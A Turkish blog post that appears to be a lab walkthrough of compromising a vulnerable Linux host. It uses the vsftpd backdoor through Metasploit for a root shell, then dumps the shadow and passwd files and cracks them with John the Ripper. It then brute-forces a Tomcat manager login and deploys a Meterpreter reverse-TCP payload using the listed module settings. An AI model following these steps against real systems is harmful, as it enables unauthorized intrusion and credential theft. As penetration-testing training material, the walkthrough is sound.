Ekim 18, 2021
11 11 11 ÖÖ
TCP nedir ? Aktarım Katmanı 2
Aktarım Katmanı Tcp Nedir
Yönlendirme Nedir 2 ?
Yönlendirme Nedir ?
Ağ Katmanı Nedir 2 ?
Ağ Katmanı Nedir ?
Veri Bağı Katmanı Nedir 2 ?
Android Studio Nasıl Kurulur ?
Veri Bağı Katmanı Nedir ?
Fiziksel Katman Nedir ?
Son Yazılar
TCP nedir ? Aktarım Katmanı 2 Aktarım Katmanı Tcp Nedir Yönlendirme Nedir 2 ? Yönlendirme Nedir ? Ağ Katmanı Nedir 2 ? Ağ Katmanı Nedir ? Veri Bağı Katmanı Nedir 2 ? Android Studio Nasıl Kurulur ? Veri Bağı Katmanı Nedir ? Fiziksel Katman Nedir ?
metasploit

Vsftpd – Apache Tomcat/Coyote Zafiyet Nasıl Yapılır ?

Paylaşım , Takip İçin

vsftpd Nedir ?

vstfpd Linux dahil Unix tabanlı işletim sistemleri için bir FTP sunucusudur. 

Zafiyet aramalarımızda vsftpd arka kapısının açık olduğunu gördük . Şimdide nasıl sızma işlemini yaptığımıza bakalım.

Metasploit içerisinden search komutumuz ile arıyoruz ve çıkan exploitimizi kullanıyoruz 

Şimdi info diyip veya show options diyerek gerekli ayarlamamızı yapmamız için gerekenleri göreceğiz. Burada sadece RHOSTS umuzu set komutuyla değiştirip run veya exploit ediyoruz

Exploit ettikten sonra shell kısmına atıyor bizi ve yetkimizin ne olduğuna root olup olmadığımıza bakıyoruz .  Sisteme root hakkıyla giriş yapılmış . Burda bırakabilirsiniz.

Sızdığımız makinanın shadow kısmında şifremiz var olabileceğinden dolayı bakacağız 

Shell command kısmına düştükten sonra shell komutu kullanarak shelle düşüyoruz ve ardından shadow komutumuzu yazıyoruz.

Shadow kısmı bittikten sonra passwd kısmınada bakacağız fakat bu kısımda kolay kolay şifrelerimizin burda olmayacağını belirtmek istiyorum çünkü şifremizi kayıtedeceğimiz bir yerin ismini şifre yapmayız.

Daha sonra shadow ve passwd kodlarını 2 farklı txt ye alıyoruz john ile şifreleri bulabilmek için.

Daha sonrasında Johntheripper ile şifrelerimizi ayarlayacağız

Apache Tomcat/Coyote

Hedefin 8180 portunda http çalışıp arkasında da tomcat çalıştırılıyordu.

Bizde tomcatden yararlanacağız.

Metasploit frameworkümüzü açtıktan sonra search tomcat login diyoruz ve exploitlerime bakıyoruz.

Evet modülde rhosts u bizden girmemizi istiyor. Bizim önceden yaptığımız işlem sadece rhost yazan kısımlara ip adresini girer. Burda ise birden fazla adres vermeye müsait olduğundan rhosts olarak tanımlanmış. Kendimiz girmemiz gerek. Ve saldırıyı yapacağı port adresini 8180 e ayrlıyoruz. (İsterseniz PASS_FILE USERPASS_FILE USER_FILE yerlerine kendi wordlistinizi koyabilirsiniz.)

Yeterince hızlı bir şifre denemesinden sonra şifremizi öğreniyoruz. Artık şifremizde elimizde olduğuna göre exploitimizi kullanma vakti gelmiş demektir. Önceden yaptığımız aramadan aldığım deploy exploitini deniyoruz ve info kısmından gerekli ayarlamalara bakıyoruz.

set httpusername tomcat
set httppassword tomcat
set rport 8180
set payload java/meterpreter/reverse_tcp

dedikten sonra exploit ediyoruz.

Bunları dememizin sebebi iste yukarda ismimizi, şifremizi ve portumuzu tomcat, 8180 olarak bulmamız idi. 

Meterpreterimiz açık sisteme giriş yapıldı. Meterpreter komutları ile bilgi alma işlemlerini gerçekleştirebilirsiniz.


Paylaşım , Takip İçin
0 0 votes
Article Rating

Bir Cevap Yazın

1 Yorum
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

[…] vsftpd […]

1
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: